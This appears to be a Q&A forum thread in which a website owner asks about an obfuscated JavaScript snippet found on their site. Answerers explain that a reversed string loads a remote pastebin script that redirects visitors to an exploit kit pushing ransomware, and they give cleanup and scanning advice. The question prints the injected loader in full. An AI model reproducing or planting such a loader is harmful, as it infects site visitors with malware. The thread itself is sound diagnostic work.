# Javascript Malware Detected by Google Scanner

Tags: javascript, web, malware

I recently came across the following code on my website

```
<script type=""text/javascript"">
document.write('>tpircs/<>""YWVPsGmx=i?php.war/moc.nibetsap//:ptth""=crs tpircs<'.split("""").reverse().join(""""))
</script>
```

What does this code do ? Am i a victim of XSS ? Is there anything my hosting company can do e.g malware scanner etc ?

Answer (score 0, accepted):

That text is reversed to form a pastebin link - the script at that pastebin is loaded and run in browser with the rest of your site code.

Comment: Hi Chris , any suggestion on how my site was compromised ? XSS ? Anyway i can "plug" the hole ?

Comment: There's no real way to tell from this excerpt. The script tag you posted in the original question will be getting inserted by whatever the actual exploit is. I'd be looking through FTP for files that shouldn't be there. There are some 'likely suspects' for the source of the compromise depending on the ecosystem the site is in - for instance if it is a wordpress site I'd start looking in the /wp-content/uploads/ directory. For me, in the past when I found a wordpress site with a similar hack there was literally a file in there called `hacked.php` which was inserting similar script tags.

Answer (score 1):

This is a redirection code to an Exploit Kit.. the actual URL is

```
pastebin[.]com/raw[.]php?i=xmGsPVWY ---> trak[masked].co.in/js
```

Please delete this code from all pages hosted on your server.

Answer (score 0):

Your site has been compromised (hacked) and injected with that malicious javascript code.

It uses multiple redirection/encoding methods, but at the end, pushes your visitors to the Angler EK (exploit kit) which then tries to foce the CryptoWall on your users.

You can try to scan it here:

https://sitecheck.sucuri.net

http://www.unmaskparasites.com/

To look for more details on the malware.

thanks,